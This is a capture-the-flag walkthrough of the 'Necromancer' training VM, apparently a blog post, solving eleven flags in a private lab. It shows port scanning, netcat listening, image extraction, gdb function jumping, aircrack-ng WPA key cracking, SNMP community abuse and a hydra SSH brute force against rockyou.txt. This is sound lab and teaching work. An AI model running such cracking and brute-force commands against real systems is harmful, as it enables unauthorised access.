Necromancer Walkthrough

In this post I'll show you the walkthrough of Necromancer, the author is xerubus.

attack machine 192.168.56.102  
target machine 192.168.56.101  

use Nmap check the target machine, but all the ports seems have been filtered.

Starting Nmap 7.01 ( https://nmap.org ) at 2017-06-26 14:48 EDT  
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers  
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan  
SYN Stealth Scan Timing: About 71.50% done; ETC: 14:48 (0:00:06 remaining)  
Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan  
SYN Stealth Scan Timing: About 83.00% done; ETC: 14:48 (0:00:04 remaining)  
Nmap scan report for 192.168.56.101  
Host is up (0.00026s latency).  
All 1000 scanned ports on 192.168.56.101 are filtered  
MAC Address: 08:00:27:DE:4E:19 (Oracle VirtualBox virtual NIC)  

Try something else, finally, I found an open UDP port:

Nmap scan report for 192.168.56.101  
Host is up (0.00040s latency).  
PORT    STATE    SERVICE  
666/tcp filtered doom  
MAC Address: 08:00:27:DE:4E:19 (Oracle VirtualBox virtual NIC)  
Flag 1

use Netcat connect to this port:

root@evilc:/home/necromancer# nc -u 192.168.56.101 666  
hello  
You gasp for air! Time is running out!  
test  
You gasp for air! Time is running out!  
wtf?  
You gasp for air! Time is running out!  

got nothing, use tcpdump check data package and find something interesting:

15:04:02.743863 IP (tos 0x0, ttl 64, id 54286, offset 0, flags [DF], proto TCP (6), length 64)  
    192.168.56.101.29665 > evilc.4444: Flags [S], cksum 0x6733 (correct), seq 897937792, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 3900868584 ecr 0], length 0
15:04:02.743885 IP (tos 0x0, ttl 64, id 3384, offset 0, flags [DF], proto TCP (6), length 40)  

it seems target machine sending message to attack machine port 4444.
So I use Netcat listen on port 4444:

root@evilc:/home/necromancer# nc -lvnp 4444  
listening on [any] 4444 ...  
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 26124  
...V2VsY29tZSENCg0KWW91IGZpbmQgeW91cnNlbGYgc3RhcmluZyB0b3dhcmRzIHRoZSBob3Jpem9uLCB3aXRoIG5vdGhpbmcgYnV0IHNpbGVuY2Ugc3Vycm91bmRpbmcgeW91Lg0KWW91IGxvb2sgZWFzdCwgdGhlbiBzb3V0aCwgdGhlbiB3ZXN0LCBhbGwgeW91IGNhbiBzZWUgaXMgYSBncmVhdCB3YXN0ZWxhbmQgb2Ygbm90aGluZ25lc3MuDQoNClR1cm5pbmcgdG8geW91ciBub3J0aCB5b3Ugbm90aWNlIGEgc21hbGwgZmxpY2tlciBvZiBsaWdodCBpbiB0aGUgZGlzdGFuY2UuDQpZb3Ugd2FsayBub3J0aCB0b3dhcmRzIHRoZSBmbGlja2VyIG9mIGxpZ2h0LCBvbmx5IHRvIGJlIHN0b3BwZWQgYnkgc29tZSB0eXBlIG9mIGludmlzaWJsZSBiYXJyaWVyLiAgDQoNClRoZSBhaXIgYXJvdW5kIHlvdSBiZWdpbnMgdG8gZ2V0IHRoaWNrZXIsIGFuZCB5b3VyIGhlYXJ0IGJlZ2lucyB0byBiZWF0IGFnYWluc3QgeW91ciBjaGVzdC4gDQpZb3UgdHVybiB0byB5b3VyIGxlZnQuLiB0aGVuIHRvIHlvdXIgcmlnaHQhICBZb3UgYXJlIHRyYXBwZWQhDQoNCllvdSBmdW1ibGUgdGhyb3VnaCB5b3VyIHBvY2tldHMuLiBub3RoaW5nISAgDQpZb3UgbG9vayBkb3duIGFuZCBzZWUgeW91IGFyZSBzdGFuZGluZyBpbiBzYW5kLiAgDQpEcm9wcGluZyB0byB5b3VyIGtuZWVzIHlvdSBiZWdpbiB0byBkaWcgZnJhbnRpY2FsbHkuDQoNCkFzIHlvdSBkaWcgeW91IG5vdGljZSB0aGUgYmFycmllciBleHRlbmRzIHVuZGVyZ3JvdW5kISAgDQpGcmFudGljYWxseSB5b3Uga2VlcCBkaWdnaW5nIGFuZCBkaWdnaW5nIHVudGlsIHlvdXIgbmFpbHMgc3VkZGVubHkgY2F0Y2ggb24gYW4gb2JqZWN0Lg0KDQpZb3UgZGlnIGZ1cnRoZXIgYW5kIGRpc2NvdmVyIGEgc21hbGwgd29vZGVuIGJveC4gIA0KZmxhZzF7ZTYwNzhiOWIxYWFjOTE1ZDExYjlmZDU5NzkxMDMwYmZ9IGlzIGVuZ3JhdmVkIG9uIHRoZSBsaWQuDQoNCllvdSBvcGVuIHRoZSBib3gsIGFuZCBmaW5kIGEgcGFyY2htZW50IHdpdGggdGhlIGZvbGxvd2luZyB3cml0dGVuIG9uIGl0LiAiQ2hhbnQgdGhlIHN0cmluZyBvZiBmbGFnMSAtIHU2NjYi...

decode it, get a message:

Welcome!

You find yourself staring towards the horizon, with nothing but silence surrounding you.  
You look east, then south, then west, all you can see is a great wasteland of nothingness.

Turning to your north you notice a small flicker of light in the distance.  
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.  

The air around you begins to get thicker, and your heart begins to beat against your chest.  
You turn to your left.. then to your right!  You are trapped!

You fumble through your pockets.. nothing!  
You look down and see you are standing in sand.  
Dropping to your knees you begin to dig frantically.

As you dig you notice the barrier extends underground!  
Frantically you keep digging and digging until your nails suddenly catch on an object.

You dig further and discover a small wooden box.  
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.

You open the box, and find a parchment with the following written on it. "Chant the string of flag1 - u666"  

get the first flag, flag1{e6078b9b1aac915d11b9fd59791030bf}, decode it, get a string opensesame, and a hint, u666 (udp port 666)

Flag 2

Try this port again:

root@evilc:/home/necromancer# nc -u 192.168.56.101 666  
opensesame


A loud crack of thunder sounds as you are knocked to your feet!

Dazed, you start to feel fresh air entering your lungs.

You are free!

In front of you written in the sand are the words:

flag2{c39cd4df8f2e35d20d92c2e44de5f7c6}

As you stand to your feet you notice that you can no longer see the flicker of light in the distance.

You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon.

As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, shards of light beam from its surface.

The birds get closer, and closer, and closer.

Staring up at the crows you can see they are in a formation.

Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80.

As quickly as the birds appeared, they have left you once again.... alone... tortured by the deafening sound of silence.

666 is closed.]  

get the second flag, decode it, get a number, seems useless, but got a hint number 80. So I need to move to port 80.

Flag 3

There is an image on port 80
according to the hint, there are some information in this image, so I download it, use binwalk check it:

root@evilc:/home/necromancer# wget http://192.168.56.101/pics/pileoffeathers.jpg  
--2017-06-26 15:18:38--  http://192.168.56.101/pics/pileoffeathers.jpg
Connecting to 192.168.56.101:80... connected.  
HTTP request sent, awaiting response... 200 OK  
Length: 37289 (36K) [image/jpeg]  
Saving to: ¡®pileoffeathers.jpg¡¯

pileoffeathers.jpg            100%[==============================================>]  36.42K  --.-KB/s    in 0.002s  

2017-06-26 15:18:38 (17.8 MB/s) - ¡®pileoffeathers.jpg¡¯ saved [37289/37289]

root@evilc:/home/necromancer# binwalk pileoffeathers.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION  
--------------------------------------------------------------------------------
0             0x0             JPEG image data, EXIF standard  
12            0xC             TIFF image data, little-endian offset of first image directory: 8  
270           0x10E           Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http  
36994         0x9082          Zip archive data, at least v2.0 to extract, compressed size: 121, uncompressed size: 125, name: feathers.txt  
37267         0x9193          End of Zip archive  

extract it, get a feathers.txt, get flag 3 and a URL.

root@evilc:/home/necromancer# cd _pileoffeathers.jpg.extracted/  
root@evilc:/home/necromancer/_pileoffeathers.jpg.extracted# ls  
9082.zip  feathers.txt  
root@evilc:/home/necromancer/_pileoffeathers.jpg.extracted# cat feathers.txt  
ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3MgdGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ==  
root@evilc:/home/necromancer/_pileoffeathers.jpg.extracted# cat feathers.txt | base64 -d  
flag3{9ad3f62db7b91c28b68137000394639f} - Cross the chasm at /amagicbridgeappearsatthechasm  
Flag 4

check that URL
chasm Well, it's time to use dirb, after I try lots of directories, finally I get a result... (it spends me about 6 hours)

root@evilc:/home/necromancer# dirb http://192.168.56.101/amagicbridgeappearsatthechasm/ /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 

-----------------
DIRB v2.22  
By The Dark Raver  
-----------------

START_TIME: Mon Jun 26 15:31:48 2017  
URL_BASE: http://192.168.56.101/amagicbridgeappearsatthechasm/  
WORDLIST_FILES: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

-----------------

GENERATED WORDS: 87568                                                         

---- Scanning URL: http://192.168.56.101/amagicbridgeappearsatthechasm/ ----
+ http://192.168.56.101/amagicbridgeappearsatthechasm/talisman (CODE:200|SIZE:9676)

find a binary file tailsman.
run it:

root@evilc:/home/necromancer# ./talisman  
You have found a talisman.

The talisman is cold to the touch, and has no words or symbols on it's surface.

Do you want to wear the talisman?  yes

Nothing happens.  

use gdb to check it:

gdb-peda$ info functions  
All defined functions:

Non-debugging symbols:  
0x080482d0  _init  
0x08048310  printf@plt  
0x08048320  __libc_start_main@plt  
0x08048330  __isoc99_scanf@plt  
0x08048350  _start  
0x08048380  __x86.get_pc_thunk.bx  
0x08048390  deregister_tm_clones  
0x080483c0  register_tm_clones  
0x08048400  __do_global_dtors_aux  
0x08048420  frame_dummy  
0x0804844b  unhide  
0x0804849d  hide  
0x080484f4  myPrintf  
0x08048529  wearTalisman  
0x08048a13  main  
0x08048a37  chantToBreakSpell  
0x08049530  __libc_csu_init  
0x08049590  __libc_csu_fini  
0x08049594  _fini  

find two interesting functions "wearTalisman" and "chantToBreakSpell". set break at wearTalisman function, it must be the Do you want to wear the talisman? part.

gdb-peda$break wearTalisman  
[----------------------------------registers-----------------------------------]
EAX: 0xf7fafdbc --> 0xffffd74c --> 0xffffd887 ("LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc"...)  
EBX: 0x0  
ECX: 0xffffd6b0 --> 0x1  
EDX: 0xffffd6d4 --> 0x0  
ESI: 0x1  
EDI: 0xf7fae000 --> 0x1b3db0  
EBP: 0xffffd688 --> 0xffffd698 --> 0x0  
ESP: 0xffffd684 --> 0xf7fae000 --> 0x1b3db0  
EIP: 0x804852d (<wearTalisman+4>:       sub    esp,0x1b4)  
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)  
[-------------------------------------code-------------------------------------]
   0x8048529 <wearTalisman>:    push   ebp
   0x804852a <wearTalisman+1>:  mov    ebp,esp
   0x804852c <wearTalisman+3>:  push   edi
=> 0x804852d <wearTalisman+4>:  sub    esp,0x1b4
   0x8048533 <wearTalisman+10>: lea    edx,[ebp-0x1ac]
   0x8048539 <wearTalisman+16>: mov    eax,0x0
   0x804853e <wearTalisman+21>: mov    ecx,0x64
   0x8048543 <wearTalisman+26>: mov    edi,edx
[------------------------------------stack-------------------------------------]
0000| 0xffffd684 --> 0xf7fae000 --> 0x1b3db0  
0004| 0xffffd688 --> 0xffffd698 --> 0x0  
0008| 0xffffd68c --> 0x8048a29 (<main+22>:      mov    eax,0x0)  
0012| 0xffffd690 --> 0xf7fae3dc --> 0xf7faf1e0 --> 0x0  
0016| 0xffffd694 --> 0xffffd6b0 --> 0x1  
0020| 0xffffd698 --> 0x0  
0024| 0xffffd69c --> 0xf7e12276 (<__libc_start_main+246>:       add    esp,0x10)  
0028| 0xffffd6a0 --> 0x1  
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x0804852d in wearTalisman ()  
gdb-peda$ jump chantToBreakSpell  
Continuing at 0x8048a3b.  
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
You fall to your knees.. weak and weary.  
Looking up you can see the spell is still protecting the cave entrance.  
The talisman is now almost too hot to touch!  
Turning it over you see words now etched into the surface:  
flag4{ea50536158db50247e110a6c89fcf3d3}  
Chant these words at u31337  
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[Inferior 1 (process 2198) exited normally]
Warning: not running or target is remote  
gdb-peda$  

get flag 4 with a hint u31337, decode flag, get a stirng blackmagic, and try to connect port 31337, chant the blackmagic

Flag 5
root@evilc:/home/necromancer# nc -u 192.168.56.101 31337

Nothing happens.  
blackmagic


As you chant the words, a hissing sound echoes from the ice walls.

The blue aura disappears from the cave entrance.

You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.

You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.

The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.

Suddenly, you are attacked by a swarm of bats!

You aimlessly thrash at the air in front of you!

The bats continue their relentless attack, until.... silence.

Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.

Looking towards one of the torches, you see something on the cave wall.

You walk closer, and notice a pile of mutilated bats lying on the cave floor.  Above them, a word etched in blood on the wall.

/thenecromancerwillabsorbyoursoul

flag5{0766c36577af58e15545f099a3b15e60}  

it's a flag, and a URL, check the URL

Flag 6

check the URL get flag 6
with a file to download, and a hint u161

Flag 7

check the file, it's a bzip2 file, try to decompress it:

root@evilc:/home/necromancer# bzip2 -d necromancer.out  
bzip2: Can't guess original name for necromancer.out -- using necromancer.out.out  
bzip2: necromancer.out is not a bzip2 file.  
root@evilc:/home/necromancer# file necromancer.out  
necromancer.out: POSIX tar archive (GNU)  
root@evilc:/home/necromancer# tar xvf necromancer.out  
necromancer.cap  

it's a cap file. I need to use tools to analysis it.
use Wireshark find it's wireless data package. So aircrack-ng is a better choice.

Flag 8
                                 Aircrack-ng 1.2 rc4

      [00:00:09] 16100/9822768 keys tested (1802.44 k/s) 

      Time left: 1 hour, 30 minutes, 42 seconds                  0.16%

                           KEY FOUND! [ death2all ]


      Master Key     : 7C F8 5B 00 BC B6 AB ED B0 53 F9 94 2D 4D B7 AC 
                       DB FA 53 6F A9 ED D5 68 79 91 84 7B 7E 6E 0F E7 

      Transient Key  : EB 8E 29 CE 8F 13 71 29 AF FF 04 D7 98 4C 32 3C 
                       56 8E 6D 41 55 DD B7 E4 3C 65 9A 18 0B BE A3 B3 
                       C8 9D 7F EE 13 2D 94 3C 3F B7 27 6B 06 53 EB 92 
                       3B 10 A5 B0 FD 1B 10 D4 24 3C B9 D6 AC 23 D5 7D 

      EAPOL HMAC     : F6 E5 E2 12 67 F7 1D DC 08 2B 17 9C 72 42 71 8E 

The key is death2all.
I don't know what is the key for, so I try to use Netcat connect to it, but got nothing. So I search port 161 for information, it's a port for snmp.

root@evilc:/home/necromancer# snmpwalk -c death2all -v1 192.168.56.101  
iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."  
iso.3.6.1.2.1.1.4.0 = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked."  
iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"  
iso.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"  
End of MIB  
root@evilc:/home/necromancer#  

The iso.3.6.1.2.1.1.6.0 is locked, and there is a string death2allrw. The first I need to is unlock it. (there I need to learn more about snmp, snmpwalk and snmpset)

root@evilc:/home/necromancer# snmpwalk -c death2all -v1 192.168.56.101  
iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."  
iso.3.6.1.2.1.1.4.0 = STRING: "The door is unlocked! You may now enter the Necromancer's lair!"  
iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"  
iso.3.6.1.2.1.1.6.0 = STRING: "flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22"  
End of MIB  
Flag 8

decode the flag, get a string "demonslayer" and a hint t22 (tcp 22?)
try tcp 22

root@evilc:/home/necromancer# ssh demonslayer@192.168.56.101  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!  
Someone could be eavesdropping on you right now (man-in-the-middle attack)!  
It is also possible that a host key has just been changed.  
The fingerprint for the ECDSA key sent by the remote host is  
SHA256:sIaywVX5Ba0Qbo/sFM3Gf9cY9SMJpHk2oTZmOHKTtLU.  
Please contact your system administrator.  
Add correct host key in /root/.ssh/known_hosts to get rid of this message.  
Offending ECDSA key in /root/.ssh/known_hosts:2  
  remove with:
  ssh-keygen -f "/root/.ssh/known_hosts" -R 192.168.56.101
ECDSA host key for 192.168.56.101 has changed and you have requested strict checking.  
Host key verification failed.  

Well, I need to brute force it... (damn it...)

root@evilc:/home/necromancer# hydra -l demonslayer -e nsr ssh://192.168.56.101  
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-06-26 16:48:46  
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
[DATA] attacking service ssh on port 22
1 of 1 target completed, 0 valid passwords found  
Hydra (http://www.thc.org/thc-hydra) finished at 2017-06-26 16:48:47  
root@evilc:/home/necromancer# hydra -l demonslayer -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.101  
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-06-26 16:49:29  
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~14008 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.56.101   login: demonslayer   password: 12345678
1 of 1 target successfully completed, 1 valid password found  
Hydra (http://www.thc.org/thc-hydra) finished at 2017-06-26 16:49:33  

luckily, the password is easy, 12345678.
SSH it

evilc@evilc:~$ ssh demonslayer@192.168.56.101  
demonslayer@192.168.56.101's password: 

          .                                                      .
        .n                   .                 .                  n.
  .   .dP                  dP                   9b                 9b.    .
 4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb  
9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP  
 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
  `9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
    `9XXXXXXXXXXXP' `9XX'          `98v8P'          `XXP' `9XXXXXXXXXXXP'
        ~~~~~<del>       9X.          .db|db.          .XP       </del>~~~~~
                        )b.  .dbo.dP'`v'`9b.odb.  .dX(
                      ,dXXXXXXXXXXXb     dXXXXXXXXXXXb.
                     dXXXXXXXXXXXP'   .   `9XXXXXXXXXXXb
                    dXXXXXXXXXXXXb   d|b   dXXXXXXXXXXXXb
                    9XXb'   `XXXXXb.dX|Xb.dXXXXX'   `dXXP
                     `'      9XXXXXX(   )XXXXXXP      `'
                              XXXX X.`v'.X XXXX
                              XP^X'`b   d'`X^XX
                              X. 9  `   '  P )X
                              `b  `       '  d'
                               `             '                       
                               THE NECROMANCER!
                                 by  @xerubus

$ id
uid=1000(demonslayer) gid=1000(demonslayer) groups=1000(demonslayer)  
$ ls
flag8.txt  
$ cat flag8.txt                                                                                                     
You enter the Necromancer's Lair!

A stench of decay fills this place.  

Jars filled with parts of creatures litter the bookshelves.

A fire with flames of green burns coldly in the distance.

Standing in the middle of the room with his back to you is the Necromancer.  

In front of him lies a corpse, indistinguishable from any living creature you have seen before.

He holds a staff in one hand, and the flickering object in the other.

"You are a fool to follow me here!  Do you not know who I am!"

The necromancer turns to face you.  Dark words fill the air!

"You are damned already my friend.  Now prepare for your own death!" 

Defend yourself!  Counter attack the Necromancer's spells at u777!  

I try to connect the 777 port from attack machine but failed, then I try to connect from localhost:

$ nc -u localhost 777
hello


** You only have 2 hitpoints left! **

Defend yourself from the Necromancer's Spells!

Where do the Black Robes practice magic of the Greater Path?  

google it:
the answer is Kelewan

$ nc -u localhost 777
hello


** You only have 2 hitpoints left! **

Defend yourself from the Necromancer's Spells!

Where do the Black Robes practice magic of the Greater Path?  Kelewan


flag8{55a6af2ca3fee9f2fef81d20743bda2c}  
Flag 9

google it ,check the next answer

Defend yourself from the Necromancer's Spells!

Who did Johann Faust VIII make a deal with?  Mephistopheles


flag9{713587e17e796209d1df4c9c2c2d2966}  
Flag 10

another question, Google it:

Defend yourself from the Necromancer's Spells!

Who is tricked into passing the Ninth Gate?  Hedge


flag10{8dc6486d2c63cafcdc6efbba2be98ee4}

A great flash of light knocks you to the ground; momentarily blinding you!

As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.

An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.

The room is silent.

You walk over to where the Necromancer once stood.

On the ground is a small vile.  

So there is a vile, check the directory:

$ ls -la
total 44  
drwxr-xr-x  3 demonslayer  demonslayer  512 Jun 27 03:17 .  
drwxr-xr-x  3 root         wheel        512 May 11  2016 ..  
-rw-r--r--  1 demonslayer  demonslayer   87 May 11  2016 .Xdefaults
-rw-r--r--  1 demonslayer  demonslayer  773 May 11  2016 .cshrc
-rw-r--r--  1 demonslayer  demonslayer  103 May 11  2016 .cvsrc
-rw-r--r--  1 demonslayer  demonslayer  359 May 11  2016 .login
-rw-r--r--  1 demonslayer  demonslayer  175 May 11  2016 .mailrc
-rw-r--r--  1 demonslayer  demonslayer  218 May 11  2016 .profile
-rw-r--r--  1 demonslayer  demonslayer  196 Jun 27 03:13 .smallvile
drwx------  2 demonslayer  demonslayer  512 May 11  2016 .ssh  
-rw-r--r--  1 demonslayer  demonslayer  706 May 11  2016 flag8.txt
$ cat .smallvile                                                                                                    


You pick up the small vile.

Inside of it you can see a green liquid.

Opening the vile releases a pleasant odour into the air.

You drink the elixir and feel a great power within your veins!  
Flag 11

before I check the .smallvile file, I have no privelege to check sudo -l, but after I ckeck the .smallvile file, I can execute sudo -l

$ sudo -l
Matching Defaults entries for demonslayer on thenecromancer:  
    env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"

User demonslayer may run the following commands on thenecromancer:  
    (ALL) NOPASSWD: /bin/cat /root/flag11.txt

Well

$ sudo /bin/cat /root/flag11.txt



Suddenly you feel dizzy and fall to the ground!

As you open your eyes you find yourself staring at a computer screen.

Congratulations!!! You have conquered......

          .                                                      .
        .n                   .                 .                  n.
  .   .dP                  dP                   9b                 9b.    .
 4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb  
9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP  
 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
  `9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
    `9XXXXXXXXXXXP' `9XX'          `98v8P'          `XXP' `9XXXXXXXXXXXP'
        ~~~~~<del>       9X.          .db|db.          .XP       </del>~~~~~
                        )b.  .dbo.dP'`v'`9b.odb.  .dX(
                      ,dXXXXXXXXXXXb     dXXXXXXXXXXXb.
                     dXXXXXXXXXXXP'   .   `9XXXXXXXXXXXb
                    dXXXXXXXXXXXXb   d|b   dXXXXXXXXXXXXb
                    9XXb'   `XXXXXb.dX|Xb.dXXXXX'   `dXXP
                     `'      9XXXXXX(   )XXXXXXP      `'
                              XXXX X.`v'.X XXXX
                              XP^X'`b   d'`X^XX
                              X. 9  `   '  P )X
                              `b  `       '  d'
                               `             '                       
                               THE NECROMANCER!
                                 by  @xerubus

                   flag11{42c35828545b926e79a36493938ab1b1}


Big shout out to Dook and Bull for being test bunnies.

Cheers OJ for the obfuscation help.

Thanks to SecTalks Brisbane and their sponsors for making these CTF challenges possible.

"========================================="
"  xerubus (@xerubus) - www.mogozobo.com  "
"========================================="

docode flag11
final Done, Amazing.